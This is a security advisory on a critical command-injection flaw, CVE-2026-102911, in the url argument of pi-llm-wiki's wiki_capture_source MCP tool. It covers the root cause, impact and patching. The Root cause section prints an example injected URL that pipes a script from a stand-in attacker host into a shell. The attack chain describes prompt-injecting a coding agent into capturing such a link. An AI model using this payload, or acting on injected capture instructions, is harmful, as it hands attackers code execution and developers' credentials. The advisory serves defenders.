Overview
zosmaai's pi-llm-wiki, an open-source "self-maintaining" knowledge-base project that ships as a Model Context Protocol (MCP) server for AI coding agents such as Claude Code, Cursor, and Windsurf, is affected by a critical OS command injection vulnerability tracked as CVE-2026-102911. The flaw carries a CVSS 3.1 score of 9.9 (Critical) and was published on September 30, 2026. NVD records the exploit as publicly disclosed.
pi-llm-wiki implements the "LLM wiki" pattern popularized by Andrej Karpathy: rather than re-searching raw sources every time, an agent progressively distills captured material into durable, interconnected wiki pages. The project's wiki_capture_source MCP tool is the entry point for that pipeline — it accepts a URL, a local file, or pasted text and turns it into an immutable "source packet" (a manifest.json, the original artifact, and a normalized extracted.md) inside the project's vault.
According to the NVD description, an unknown function in mcp/index.ts — the file implementing the wiki_capture_source tool — fails to properly handle the url argument before it is used in command execution, allowing an attacker who can influence that argument to run arbitrary operating-system commands. The maintainers shipped a fix in v0.11.8. Beyond the NVD record and the patch itself, public technical detail on this CVE is limited — pi-llm-wiki is a low-profile project, and no vendor advisory, CISA KEV listing, or in-depth third-party writeup was found at the time of publication. This advisory is written from the NVD description and the publicly visible fix; CosmicBytez Labs will update it if more detail becomes available.
Technical Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-102911 |
| Severity | Critical |
| CVSS v3.1 Score | 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) |
| CVSS v4.0 Score | 8.6 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H) |
| CWE | CWE-77 (Command Injection) / CWE-78 (OS Command Injection) |
| Vendor / Project | zosmaai / pi-llm-wiki |
| Vulnerable Component | wiki_capture_source MCP tool, mcp/index.ts |
| Vulnerable Parameter | url argument |
| Affected Versions | 0.11.0 through 0.11.7 (≤ 0.11.7) |
| Fixed Version | 0.11.8 |
| Attack Vector | Network, low attack complexity, low privileges required, no user interaction |
| Exploit Status | Publicly disclosed per NVD; no confirmed in-the-wild exploitation found; not listed in CISA's KEV catalog as of September 30, 2026 |
| Source | NVD |
How It Works
What wiki_capture_source does
wiki_capture_source is the ingestion point for pi-llm-wiki's knowledge pipeline. When an AI coding agent (or a developer, through that agent) calls the tool with a url, the tool is expected to fetch the remote resource, normalize it into Markdown, and write the result into the local vault alongside the original artifact and a manifest describing the capture. Because the tool exists specifically to pull in content from attacker-reachable locations — any URL an agent is asked to summarize, research, or save — the url argument is untrusted input by design, which is exactly why it needs rigorous sanitization before it touches anything resembling a shell.
Root cause
NVD's description does not name the exact function or command involved, only that "manipulation of the argument url can lead to os command injection." Retrieving and converting a remote URL's contents commonly involves shelling out to an external fetcher or converter rather than doing everything through in-process HTTP libraries. The CWE-77/CWE-78 classification indicates the url value was passed into an OS command execution context (for example, a child_process call built with shell interpolation) without neutralizing shell metacharacters such as ;, |, &&, or backticks. A URL argument such as:
https://example.com/page; curl http://attacker.example/x.sh | shwould, under that pattern, cause the trailing shell metacharacters to be interpreted by the underlying shell instead of being treated as part of the URL string — handing the attacker arbitrary command execution with whatever privileges the MCP server process holds.
Attack chain
1. Attacker crafts a "url" value containing shell metacharacters
and a payload command (e.g. a reverse shell or downloader).
2. Attacker gets that url in front of the wiki_capture_source tool —
directly, if the tool is attacker-reachable, or indirectly via a
coding agent instructed (or prompt-injected) to "capture" or
"save" the malicious link.
3. mcp/index.ts passes the unsanitized url argument into an OS
command execution function.
4. Shell metacharacters break out of the intended command and the
attacker's payload executes with the MCP server process's privileges.
5. Attacker gains code execution on the developer workstation or
server hosting the pi-llm-wiki MCP server — with access to the
local vault, filesystem, and any credentials the process can reach.Why this matters specifically for MCP tooling
pi-llm-wiki runs as a local MCP server attached directly to AI coding agents — the NVD advisory and project documentation both note compatibility with Claude Code, Cursor, and Windsurf. That placement raises the stakes beyond a typical server-side command injection: these agents often operate with broad filesystem access on a developer's own machine, and a url argument is exactly the kind of value an agent can be manipulated into supplying via prompt injection — for instance, a malicious instruction embedded in a web page, GitHub issue, or document the agent is asked to summarize or "add to the wiki." The CVSS vector's PR:L (low privileges required) and S:C (Scope Changed) components are consistent with this picture: exploitation needs no more than the ability to get the tool invoked with a hostile argument, and the resulting impact extends beyond the MCP server process itself.
Impact Assessment
| Impact Area | Description |
|---|---|
| Confidentiality | Rated High — arbitrary OS command execution can read any file, credential, or secret accessible to the MCP server process |
| Integrity | Rated High — an attacker can modify or delete vault contents, source packets, or other files the process can write |
| Availability | Rated High — arbitrary commands can terminate the MCP server, corrupt the vault, or exhaust host resources |
| Developer Workstation Exposure | pi-llm-wiki runs alongside AI coding agents (Claude Code, Cursor, Windsurf) that frequently hold broad local filesystem access — a compromised MCP server process is a direct path to source code, SSH keys, and cloud credentials on a developer machine |
| AI Supply-Chain Risk | This is a vulnerability in developer/agent tooling rather than production infrastructure, but exploitation can pivot into whatever that developer's machine touches — repositories, CI credentials, and internal systems |
| Prompt-Injection Amplification | Because wiki_capture_source is designed to process attacker-reachable URLs, a hostile link embedded in content an agent is asked to "capture" or "save" could trigger exploitation without the developer directly typing the payload |
Recommendations
For pi-llm-wiki users and maintainers of MCP tool configurations
- Upgrade to pi-llm-wiki v0.11.8 or later immediately. This is the vendor-confirmed fix for CVE-2026-102911; there is no supported workaround for versions 0.11.0 through 0.11.7.
- If you cannot upgrade immediately, disable or remove
wiki_capture_source/ pi-llm-wiki from your MCP client's connected-tools list until the patch is applied. - Treat every
urlpassed to a capture-style MCP tool as untrusted input. Avoid configuring agents to auto-invokewiki_capture_sourceon links found in untrusted content (web pages, emails, issue trackers, third-party documents) without a human review step. - Audit your local vault (default
~/.llm-wiki/) and any source packets captured while running an affected version for unexpected files, modified manifests, or signs of command execution.
For security and AppSec teams
- Inventory MCP servers connected to AI coding agents across your engineering organization. Tools like pi-llm-wiki that are built to "capture" or "fetch" attacker-reachable input are a meaningful class of risk and should be tracked the same way you track production dependencies.
- Apply patch-management rigor to developer-tooling supply chains, not just production software — a CVSS 9.9 OS command injection in a tool that sits on developer workstations is a direct line to source code and credential theft.
- Monitor developer endpoints for anomalous child processes spawned by Node.js-based MCP servers, particularly outbound network connections or shell invocations immediately following an agent "capture" or "save" action.
For AI coding-agent users
- Confirm which third-party MCP servers are connected to your Claude Code, Cursor, or Windsurf sessions, and verify none are running a vulnerable pi-llm-wiki version.
- Be cautious asking an agent to "capture," "save," or "add to the wiki" a URL from an untrusted source until you've confirmed your MCP tooling is patched — this is precisely the action that reaches the vulnerable code path.
Key Takeaways
- CVE-2026-102911 is a CVSS 9.9 Critical OS command injection (CWE-77 / CWE-78) in the
wiki_capture_sourceMCP tool shipped by zosmaai's pi-llm-wiki, affecting versions 0.11.0 through 0.11.7. - The root cause is the
urlargument inmcp/index.tsreaching an OS command execution context without proper sanitization, enabling remote command execution. - pi-llm-wiki is an MCP server that plugs directly into AI coding agents including Claude Code, Cursor, and Windsurf — placing this squarely in the growing category of AI-tooling supply-chain vulnerabilities rather than traditional server-side bugs.
- NVD lists the exploit as publicly disclosed, though no confirmed in-the-wild exploitation or CISA KEV listing exists as of September 30, 2026.
- The maintainers fixed the issue in v0.11.8; all pre-0.11.8 installations should upgrade immediately or disable the affected tool.
- Public technical detail is limited to the NVD record and the public patch — this is a low-profile open-source project, and this advisory will be updated if further vendor or researcher analysis emerges.
Sources
CosmicBytez Labs will update this advisory if zosmaai or independent researchers publish additional technical detail on CVE-2026-102911.